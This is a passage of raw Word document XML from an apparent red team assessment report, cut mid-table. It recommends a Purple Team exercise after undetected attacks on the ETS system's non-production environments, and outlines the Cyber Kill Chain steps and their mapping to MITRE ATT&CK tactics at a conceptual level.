    <w:p w14:paraId="40BDD1D8" w14:textId="3272BCA8" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc212654629"/>
      <w:bookmarkStart w:id="57" w:name="_Toc213253535"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Other recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="1965FB76" w14:textId="0A485B99" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00332BC0" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">In addition to the technical findings and recommendations in this report, DIGIT.S1.SA </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>highly recommends performing a Purple Team assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t>validate the</w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">efficiency and effectiveness of the monitoring and alerting capabilities applied to </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS</w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, as most of the attacks in the internal non-prod </w:t>
      </w:r>
      <w:r w:rsidR="00C81356" w:rsidRPr="001019D3">
        <w:t>CLIMA</w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> environments were not detected. This Purple Team assessment would be executed in collaboration with the provider of </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS</w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> systems and the Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E057713" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FE6D2" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc212654630"/>
      <w:bookmarkStart w:id="59" w:name="_Toc213253536"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="7CC6C680" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="009710C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc212654631"/>
      <w:bookmarkStart w:id="61" w:name="_Toc213253537"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="70BA0FE3" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Red Team engagements performed by DIGIT.S1.SA Red Team employ real-world adversary techniques to target the systems in scope. The Red Team uses a red team model emulating real adversary tools, techniques, and procedures (TTPs) driven by attack scenarios and goals. To efficiently allocate their resources to the unique threats they are facing, DGs are encouraged to create scenarios for their attack simulation by identifying the most likely adversaries and the attack vectors through threat modelling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666885B" w14:textId="5114DB2C" w:rsidR="009710C1" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Unlike a traditional penetration test, the red team model allows for the testing of the entire security scope of an organization to include people, processes, technology and defences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04693EFA" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="009710C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc212654632"/>
      <w:bookmarkStart w:id="63" w:name="_Toc213253538"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>The “Cyber Kill Chain” framework by Lockheed Martin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="54A1B850" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team is following the “Cyber Kill Chain” framework, developed by Lockheed Martin, to manage and control the performed activities. The framework foresees 8 steps, which are then mapped to the well-known “MITRE ATT&amp;CK Enterprise” matrix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B28B771" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="Text2"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="509EFD6E" wp14:editId="0F85369D">
            <wp:extent cx="2656840" cy="3100705"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="23495"/>
            <wp:docPr id="227650510" name="Picture 2276505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6840" cy="3100705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="441256D9" w14:textId="3D319232" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc213253786"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>: Cyber Kill Chain Diagram.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="0E9A92C9" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers gather information on their target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFDD53A" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weaponization</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers develop their attack payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9F25A" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers launch their intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68035031" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers compromise their target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62285E69" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers gain persistence on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAD097" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>control</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers issue commands to their payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E100A8" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lateral</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>movement</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attackers move laterally through the network to their objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2F1AA" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Actions</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (e.g. Data exfil): Attackers complete their end goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B185FC" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:r w:rsidRPr="001019D3">
        <w:t>There are three major parts in a Red Team engagement are to accurately emulate a realistic threat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DCC71" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get In</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Recon, weaponization, delivery, exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48F838" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stay In</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Installation, Command and Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D676F22" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="000C0532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Act</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Lateral movement, actions on objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE672F" w14:textId="77777777" w:rsidR="00A66D5A" w:rsidRPr="001019D3" w:rsidRDefault="00A66D5A">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F4FAE" w14:textId="4A75598F" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="00A66D5A" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="000C0532" w:rsidRPr="001019D3">
        <w:t>he sequence of activities in this approach involves open-source intelligence (OSINT) collection, enumeration, exploitation, and attack. Information gathered during OSINT collection is used in conjunction with passive and active enumeration. Enumeration information typically yields details about specific hardware, services, and software running on remote machines. The next step involves analysing all accumulated information to identify potential attack vectors. If a weakness can be exploited, operators attempt to obtain additional access into the network or system and to collect sensitive system information to create effects and demonstrate impact to the customer. Vetted tools, methodologies, and operator experience are employed to prevent unintentional disruption, degradation, or denial of service to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040A85F" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="009710C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc187925761"/>
      <w:bookmarkStart w:id="66" w:name="_Toc187925762"/>
      <w:bookmarkStart w:id="67" w:name="_Toc187925763"/>
      <w:bookmarkStart w:id="68" w:name="_Toc212654633"/>
      <w:bookmarkStart w:id="69" w:name="_Toc213253539"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Cyber Kill Chain mapping to the MITRE ATT&amp;CK matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="6B87F609" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>This report presents the 8 steps of the Cyber Kill Chain framework mapped into the well-known MITRE ATT&amp;CK Enterprise matrix. The mapping is done on the level of tactics:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3072" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2497"/>
        <w:gridCol w:w="2877"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="15599646" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59F6B9F1" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Lockheed Martin (steps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="69484A5C" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>MITRE ATT&amp;CK (tactics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="17ED4BF1" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28E6AFA8" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="34ED8AA9" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="410CDEDA" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0587082A" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Weaponization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2850DBCC" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="24FB7E50" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="25CE1E73" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F72DFAA" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="391CE9F2" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="5F2978C9" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="550B99ED" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="0193E1F6" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="2547C261" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4CF8D86E" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="09FFBAA7" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2323" w:type="pct"/>
            <w:vMerge/>
          </w:tcPr>
